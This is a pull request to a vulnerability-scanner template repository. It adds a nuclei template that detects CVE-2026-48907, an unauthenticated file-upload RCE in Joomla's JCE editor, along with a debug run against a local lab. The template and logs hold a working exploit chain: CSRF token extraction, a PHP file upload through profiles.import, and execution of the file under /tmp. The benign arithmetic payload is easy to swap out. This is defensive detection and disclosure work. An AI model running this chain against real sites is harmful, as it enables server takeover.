### PR TITLE
Add template for CVE-2026-48907 - Joomla JCE unauthenticated RCE via profile import

### DIFF
--- a/http/cves/2026/CVE-2026-48907.yaml
+++ b/http/cves/2026/CVE-2026-48907.yaml
@@ -1,0 +1,64 @@
+id: CVE-2026-48907
+info:
+  name: Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
+  author: YesWeHack
+  severity: critical
+  description: |-
+    A vulnerability in the JCE editor extension for Joomla allows an unauthenticated attacker to create arbitrary profiles via the import functionality,
+    allowing them to upload and execute arbitrary files on the server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-48907
+    - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj
+    - https://www.joomlacontenteditor.net/support/changelog/editor
+    - https://github.com/ywh-jfellus/CVE-2026-48907
+  remediation: |
+    Upgrade to JCE Editor version 2.9.99.5 or later and further apply hardening measures to the apache configuration, such as
+    preventing execution of files in tmp/ and images/ directories.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-48907
+    cwe-id: CWE-284 # Improper Access Control
+  metadata:
+    product: joomlacontenteditor
+    vendor: joomlacontenteditor.net
+    impact: Remote Code Execution (RCE)
+    shodan-query: cpe:"cpe:/a:joomla:joomla"
+    fofa-query: app="Joomla"
+  tags: cve,cve2026,joomla,jce,rce,critical,unauth
+
+variables:
+  payload: "<?= 45*69 ?>"
+  tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+    extractors:
+      - type: regex
+        name: csrf_token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'
+          - '<input[^>]*name="([a-f0-9]{32})"[^>]*value="1"'
+
+  - raw:
+      - "POST /index.php?option=com_jce HTTP/1.1\r\nHost: {{Hostname}}\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 417\r\nContent-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d\r\n\r\n--66dea244639dd05378afdad58c2c9c1d\r\nContent-Disposition: form-data; name=\"task\"\r\n\r\nprofiles.import\r\n--66dea244639dd05378afdad58c2c9c1d\r\nContent-Disposition: form-data; name=\"{{csrf_token}}\"\r\n\r\n1\r\n--66dea244639dd05378afdad58c2c9c1d\r\nContent-Disposition: form-data; name=\"profile_file\"; filename=\"{{tmp_file}}\"\r\nContent-Type: application/xml\r\n\r\n{{payload}}\n\r\n--66dea244639dd05378afdad58c2c9c1d--\r\n"
+    matchers:
+      - type: status
+        internal: true
+        status:
+          - 200
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/tmp/{{tmp_file}}"
+    matchers:
+      - type: word
+        part: body
+        condition: and
+        words:
+          - "3105"

--- a/http/cves/2026/CVE-2026-48907.yaml
+++ b/http/cves/2026/CVE-2026-48907.yaml
@@ -1,11 +1,14 @@
 id: CVE-2026-48907
 info:
   name: Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
-  author: YesWeHack
+  author: ywh-jfellus
   severity: critical
-  description: |-
-    A vulnerability in the JCE editor extension for Joomla allows an unauthenticated attacker to create arbitrary profiles via the import functionality,
-    allowing them to upload and execute arbitrary files on the server.
+  description: |
+    Joomla JCE editor extension contains an unrestricted file upload vulnerability caused by allowing unauthenticated users to create new editor profiles, letting attackers upload and execute PHP code remotely, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can upload and execute arbitrary PHP code, leading to full remote code execution on the server.
+  remediation: |
+    pdate to the latest version of the JCE editor extension.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-48907
     - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj
@@ -18,23 +21,37 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 10.0
     cve-id: CVE-2026-48907
-    cwe-id: CWE-284 # Improper Access Control
+    cwe-id: CWE-284
   metadata:
-    product: joomlacontenteditor
-    vendor: joomlacontenteditor.net
-    impact: Remote Code Execution (RCE)
-    shodan-query: cpe:"cpe:/a:joomla:joomla"
+    verified: true
+    max-request: 3
+    vendor: joomlacontenteditor
+    product: jce
+    shodan-query: http.component:"Joomla"
     fofa-query: app="Joomla"
-  tags: cve,cve2026,joomla,jce,rce,critical,unauth
+  tags: cve,cve2026,joomla,jce,rce,unauth,intrusive,unauth
 
 variables:
   payload: "<?= 45*69 ?>"
   tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"
-
+ 
+flow: http(1) && http(2) && http(3)
+ 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+ 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "Joomla")'
+          - 'contains(body, "csrf.token")'
+        condition: and
+        internal: true
+ 
     extractors:
       - type: regex
         name: csrf_token
@@ -43,22 +60,48 @@ http:
         internal: true
         regex:
           - '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'
-          - '<input[^>]*name="([a-f0-9]{32})"[^>]*value="1"'
-
+ 
   - raw:
-      - "POST /index.php?option=com_jce HTTP/1.1\r\nHost: {{Hostname}}\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 417\r\nContent-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d\r\n\r\n--66dea244639dd05378afdad58c2c9c1d\r\nContent-Disposition: form-data; name=\"task\"\r\n\r\nprofiles.import\r\n--66dea244639dd05378afdad58c2c9c1d\r\nContent-Disposition: form-data; name=\"{{csrf_token}}\"\r\n\r\n1\r\n--66dea244639dd05378afdad58c2c9c1d\r\nContent-Disposition: form-data; name=\"profile_file\"; filename=\"{{tmp_file}}\"\r\nContent-Type: application/xml\r\n\r\n{{payload}}\n\r\n--66dea244639dd05378afdad58c2c9c1d--\r\n"
+      - |
+        POST /index.php?option=com_jce HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d
+ 
+        --66dea244639dd05378afdad58c2c9c1d
+        Content-Disposition: form-data; name="task"
+ 
+        profiles.import
+        --66dea244639dd05378afdad58c2c9c1d
+        Content-Disposition: form-data; name="{{csrf_token}}"
+ 
+        1
+        --66dea244639dd05378afdad58c2c9c1d
+        Content-Disposition: form-data; name="profile_file"; filename="{{tmp_file}}"
+        Content-Type: application/xml
+ 
+        {{payload}}
+        --66dea244639dd05378afdad58c2c9c1d--
+ 
     matchers:
-      - type: status
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "success")'
+        condition: and
         internal: true
-        status:
-          - 200
-
-  - method: GET
-    path:
-      - "{{BaseURL}}/tmp/{{tmp_file}}"
+ 
+  - raw:
+      - |
+        GET /tmp/{{tmp_file}} HTTP/1.1
+        Host: {{Hostname}}
+ 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
-        condition: and
         words:
           - "3105"
+ 
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-48907.yaml
+++ b/http/cves/2026/CVE-2026-48907.yaml
@@ -34,15 +34,15 @@ info:
 variables:
   payload: "<?= 45*69 ?>"
   tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"
- 
+
 flow: http(1) && http(2) && http(3)
- 
+
 http:
   - raw:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers:
       - type: dsl
         dsl:
@@ -51,7 +51,7 @@ http:
           - 'contains(body, "csrf.token")'
         condition: and
         internal: true
- 
+
     extractors:
       - type: regex
         name: csrf_token
@@ -60,28 +60,28 @@ http:
         internal: true
         regex:
           - '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'
- 
+
   - raw:
       - |
         POST /index.php?option=com_jce HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d
- 
+
         --66dea244639dd05378afdad58c2c9c1d
         Content-Disposition: form-data; name="task"
- 
+
         profiles.import
         --66dea244639dd05378afdad58c2c9c1d
         Content-Disposition: form-data; name="{{csrf_token}}"
- 
+
         1
         --66dea244639dd05378afdad58c2c9c1d
         Content-Disposition: form-data; name="profile_file"; filename="{{tmp_file}}"
         Content-Type: application/xml
- 
+
         {{payload}}
         --66dea244639dd05378afdad58c2c9c1d--
- 
+
     matchers:
       - type: dsl
         dsl:
@@ -89,19 +89,19 @@ http:
           - 'contains(body, "success")'
         condition: and
         internal: true
- 
+
   - raw:
       - |
         GET /tmp/{{tmp_file}} HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "3105"
- 
+
       - type: status
         status:
           - 200

--- a/http/cves/2026/CVE-2026-48907.yaml
+++ b/http/cves/2026/CVE-2026-48907.yaml
@@ -14,9 +14,6 @@ info:
     - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj
     - https://www.joomlacontenteditor.net/support/changelog/editor
     - https://github.com/ywh-jfellus/CVE-2026-48907
-  remediation: |
-    Upgrade to JCE Editor version 2.9.99.5 or later and further apply hardening measures to the apache configuration, such as
-    preventing execution of files in tmp/ and images/ directories.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 10.0
@@ -46,7 +43,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
+          - "status_code == 200"
           - 'contains(body, "Joomla")'
           - 'contains(body, "csrf.token")'
         condition: and
@@ -85,7 +82,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
+          - "status_code == 200"
           - 'contains(body, "success")'
         condition: and
         internal: true

--- a/http/cves/2026/CVE-2026-48907.yaml
+++ b/http/cves/2026/CVE-2026-48907.yaml
@@ -8,7 +8,7 @@ info:
   impact: |
     Unauthenticated attackers can upload and execute arbitrary PHP code, leading to full remote code execution on the server.
   remediation: |
-    pdate to the latest version of the JCE editor extension.
+    Update to the latest version of the JCE editor extension.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-48907
     - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj


### PR DESCRIPTION

### PR Information

- Added CVE-2026-48907
- References: 
    - https://www.joomlacontenteditor.net/support/changelog/editor
    - https://github.com/projectdiscovery/nuclei-templates/issues/16379
    - https://nvd.nist.gov/vuln/detail/CVE-2026-48907

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

See https://github.com/ywh-jfellus/CVE-2026-48907 for full reproduction on docker compose vulnerable *vs* patched labs.

#### Additional Details (leave it blank if not applicable)

```
$nuclei -duc -u http://localhost:9999 -t CVE-2026-48907.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.8.0

                projectdiscovery.io

[INF] Current nuclei version: v3.8.0 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: v10.4.3 (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 179
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-48907] Dumped HTTP request for http://localhost:9999/

GET / HTTP/1.1
Host: localhost:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2026-48907] Dumped HTTP response http://localhost:9999/

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Cross-Origin-Opener-Policy: same-origin
Date: Thu, 11 Jun 2026 14:21:22 GMT
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Thu, 11 Jun 2026 14:21:22 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.67 (Debian)
Set-Cookie: ba8f9ec03e299a9d8b3e889b3c4b05e4=3301bbb53da4dd0d536b8c031b981bae; path=/; HttpOnly
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.4.22

<!DOCTYPE html>
<html lang="en-gb" dir="ltr">

<head>
    <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="generator" content="Joomla! - Open Source Content Management">
        <title>Home</title>
        <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="Home">
        <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Home">
        <link href="/media/system/images/joomla-favicon.svg" rel="icon" type="image/svg+xml">
        <link href="/media/system/images/favicon.ico" rel="alternate icon" type="image/vnd.microsoft.icon">
        <link href="/media/system/images/joomla-favicon-pinned.svg" rel="mask-icon" color="#000">

    <link href="/media/system/css/joomla-fontawesome.min.css?0e257a" rel="lazy-stylesheet"><noscript><link href="/media/system/css/joomla-fontawesome.min.css?0e257a" rel="stylesheet"></noscript>
        <link href="/media/templates/site/cassiopeia/css/template.min.css?0e257a" rel="stylesheet">
        <link href="/media/templates/site/cassiopeia/css/global/colors_standard.min.css?0e257a" rel="stylesheet">
        <link href="/media/mod_menu/css/mod-menu.min.css?a45ede" rel="stylesheet">
        <link href="/media/templates/site/cassiopeia/css/vendor/joomla-custom-elements/joomla-alert.min.css?0.4.1" rel="stylesheet">
        <style>:root {
                --hue: 214;
                --template-bg-light: #f0f4fb;
                --template-text-dark: #495057;
                --template-text-light: #ffffff;
                --template-link-color: var(--link-color);
                --template-special-color: #001B4C;

        }</style>

    <script type="application/json" class="joomla-script-options new">{"joomla.jtext":{"JSHOWPASSWORD":"Show Password","JHIDEPASSWORD":"Hide Password","ERROR":"Error","MESSAGE":"Message","NOTICE":"Notice","WARNING":"Warning","JCLOSE":"Close","JOK":"OK","JOPEN":"Open"},"system.paths":{"root":"","rootFull":"http:\/\/localhost:9999\/","base":"","baseFull":"http:\/\/localhost:9999\/"},"csrf.token":"472840aa330f66926ea33a59da4c9fb5","system.keepalive":{"interval":840000,"uri":"\/index.php\/component\/ajax?format=json"}}</script>
        <script src="/media/system/js/core.min.js?a3d8f8"></script>
        <script src="/media/templates/site/cassiopeia/js/template.min.js?0e257a" type="module"></script>
        <script src="/media/mod_menu/js/menu.min.js?5a565f" type="module"></script>
        <script src="/media/system/js/keepalive.min.js?08e025" type="module"></script>
        <script src="/media/system/js/fields/passwordview.min.js?61f142" defer></script>
        <script src="/media/system/js/messages.min.js?9a4811" type="module"></script>
        <script type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","@id":"http://localhost:9999/#/schema/BreadcrumbList/17","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"http://localhost:9999/index.php","name":"Home"}}]}</script>

</head>

<body id="top" class="site com_content wrapper-static view-featured no-layout no-task itemid-101 has-sidebar-right">
    <header class="header container-header full-width">

        
        
                    <div class="grid-child">
                <div class="navbar-brand">
                    <a class="brand-logo" href="/">
                        <img class="logo d-inline-block" loading="eager" decoding="async" src="/media/templates/site/cassiopeia/images/logo.svg" alt="Vulnerable Joomla">                    </a>
                                    </div>
            </div>
        
            </header>

    <div class="site-grid">
        
        
        
        
        <div class="grid-child container-component">
            <nav class="mod-breadcrumbs__wrapper" aria-label="Breadcrumbs">
    <ol class="mod-breadcrumbs breadcrumb px-3 py-2">
                    <li class="mod-breadcrumbs__here float-start">
                You are here: &#160;
            </li>
        
        <li class="mod-breadcrumbs__item breadcrumb-item active"><span>Home</span></li>    </ol>
    </nav>

            
            <div id="system-message-container" aria-live="polite"></div>

            <main>
                <div class="blog-featured">
        <div class="page-header">
        <h1>
        Home        </h1>
    </div>
    
    
    
    
    
</div>

            </main>
            
        </div>

                    <div class="grid-child container-sidebar-right">
                <div class="sidebar-right card ">
            <h3 class="card-header ">Main Menu</h3>        <div class="card-body">
                <ul id="mod-menu1" class="mod-menu mod-list nav ">
<li class="nav-item item-101 default current active"><a href="/index.php" aria-current="page">Home</a></li></ul>
    </div>
</div>
<div class="sidebar-right card ">
            <h3 class="card-header ">Login Form</h3>        <div class="card-body">
                <form id="login-form-16" class="mod-login" action="/index.php" method="post">

    
    <div class="mod-login__userdata userdata">
        <div class="mod-login__username form-group">
                            <div class="input-group">
                    <input id="modlgn-username-16" type="text" name="username" class="form-control" autocomplete="username" placeholder="Username">
                    <label for="modlgn-username-16" class="visually-hidden">Username</label>
                    <span class="input-group-text" title="Username">
                        <span class="icon-user icon-fw" aria-hidden="true"></span>
                    </span>
                </div>
                    </div>

        <div class="mod-login__password form-group">
                            <div class="input-group">
                    <input id="modlgn-passwd-16" type="password" name="password" autocomplete="current-password" class="form-control" placeholder="Password">
                    <label for="modlgn-passwd-16" class="visually-hidden">Password</label>
                    <button type="button" class="btn btn-secondary input-password-toggle">
                        <span class="icon-eye icon-fw" aria-hidden="true"></span>
                        <span class="visually-hidden">Show Password</span>
                    </button>
                </div>
                    </div>

                    <div class="mod-login__remember form-group">
                <div id="form-login-remember-16" class="form-check">
                    <input type="checkbox" name="remember" class="form-check-input" value="yes" id="form-login-input-remember-16">
                    <label class="form-check-label" for="form-login-input-remember-16">
                        Remember Me                    </label>
                </div>
            </div>
        
        
        <div class="mod-login__submit form-group">
            <button type="submit" name="Submit" class="btn btn-primary w-100">Log in</button>
        </div>

                    <ul class="mod-login__options list-unstyled">
                <li>
                    <a href="/index.php/component/users/reset">
                    Forgot your password?</a>
                </li>
                <li>
                    <a href="/index.php/component/users/remind">
                    Forgot your username?</a>
                </li>
                            </ul>
        <input type="hidden" name="option" value="com_users">
        <input type="hidden" name="task" value="user.login">
        <input type="hidden" name="return" value="aHR0cDovL2xvY2FsaG9zdDo5OTk5Lw==">
        <input type="hidden" name="472840aa330f66926ea33a59da4c9fb5" value="1">    </div>
    </form>
    </div>
</div>

            </div>
        
        
            </div>

    
    
    
</body>

</html>
[INF] [CVE-2026-48907] Dumped HTTP request for http://localhost:9999/index.php?option=com_jce

POST /index.php?option=com_jce HTTP/1.1
Host: localhost:9999
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Content-Length: 449
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d
Cookie: ba8f9ec03e299a9d8b3e889b3c4b05e4=3301bbb53da4dd0d536b8c031b981bae

--66dea244639dd05378afdad58c2c9c1d
Content-Disposition: form-data; name="task"

profiles.import
--66dea244639dd05378afdad58c2c9c1d
Content-Disposition: form-data; name="472840aa330f66926ea33a59da4c9fb5"

1
--66dea244639dd05378afdad58c2c9c1d
Content-Disposition: form-data; name="profile_file"; filename="nuclei-8f1dec5268b6d098b6d7ea5da81a661a.xml.php"
Content-Type: application/xml

<?= 45*69 ?>

--66dea244639dd05378afdad58c2c9c1d--
[DBG] [CVE-2026-48907] Dumped HTTP response http://localhost:9999/index.php?option=com_jce

HTTP/1.1 200 OK
Connection: close
Content-Length: 152
Content-Type: application/json
Date: Thu, 11 Jun 2026 14:21:22 GMT
Server: Apache/2.4.67 (Debian)
X-Powered-By: PHP/8.4.22

{"success":true,"message":"","messages":{"info":["0 Profile(s) imported successfully"]},"data":{"redirect":"\/index.php\/component\/jce?view=profiles"}}
[INF] [CVE-2026-48907] Dumped HTTP request for http://localhost:9999/tmp/nuclei-8f1dec5268b6d098b6d7ea5da81a661a.xml.php

GET /tmp/nuclei-8f1dec5268b6d098b6d7ea5da81a661a.xml.php HTTP/1.1
Host: localhost:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Connection: close
Accept: */*
Accept-Language: en
Cookie: ba8f9ec03e299a9d8b3e889b3c4b05e4=3301bbb53da4dd0d536b8c031b981bae
Accept-Encoding: gzip

[DBG] [CVE-2026-48907] Dumped HTTP response http://localhost:9999/tmp/nuclei-8f1dec5268b6d098b6d7ea5da81a661a.xml.php

HTTP/1.1 200 OK
Connection: close
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Date: Thu, 11 Jun 2026 14:21:22 GMT
Server: Apache/2.4.67 (Debian)
X-Powered-By: PHP/8.4.22

3105
[CVE-2026-48907:word-1] [http] [critical] http://localhost:9999/tmp/nuclei-8f1dec5268b6d098b6d7ea5da81a661a.xml.php
[INF] Scan completed in 37.437791ms. 1 matches found.
```

Corresponding server logs
```
joomla-1  | [Thu Jun 11 14:21:22.232812 2026] [php:warn] [pid 26:tid 26] [client 172.20.0.1:35932] PHP Warning:  simplexml_load_string(): <?= 45*69 ?> in /var/www/html/administrator/components/com_jce/helpers/profiles.php on line 291
joomla-1  | [Thu Jun 11 14:21:22.232816 2026] [php:warn] [pid 26:tid 26] [client 172.20.0.1:35932] PHP Warning:  simplexml_load_string():   ^ in /var/www/html/administrator/components/com_jce/helpers/profiles.php on line 291
joomla-1  | [Thu Jun 11 14:21:22.232821 2026] [php:warn] [pid 26:tid 26] [client 172.20.0.1:35932] PHP Warning:  simplexml_load_string(): Entity: line 1: parser error : Start tag expected, '<' not found in /var/www/html/administrator/components/com_jce/helpers/profiles.php on line 291
joomla-1  | [Thu Jun 11 14:21:22.232824 2026] [php:warn] [pid 26:tid 26] [client 172.20.0.1:35932] PHP Warning:  simplexml_load_string(): <?= 45*69 ?> in /var/www/html/administrator/components/com_jce/helpers/profiles.php on line 291
joomla-1  | [Thu Jun 11 14:21:22.232826 2026] [php:warn] [pid 26:tid 26] [client 172.20.0.1:35932] PHP Warning:  simplexml_load_string():   ^ in /var/www/html/administrator/components/com_jce/helpers/profiles.php on line 291
joomla-1  | 172.20.0.1 - - [11/Jun/2026:14:21:22 +0000] "POST /index.php?option=com_jce HTTP/1.1" 200 338 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
joomla-1  | 172.20.0.1 - - [11/Jun/2026:14:21:22 +0000] "GET /tmp/nuclei-8f1dec5268b6d098b6d7ea5da81a661a.xml.php HTTP/1.1" 200 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
```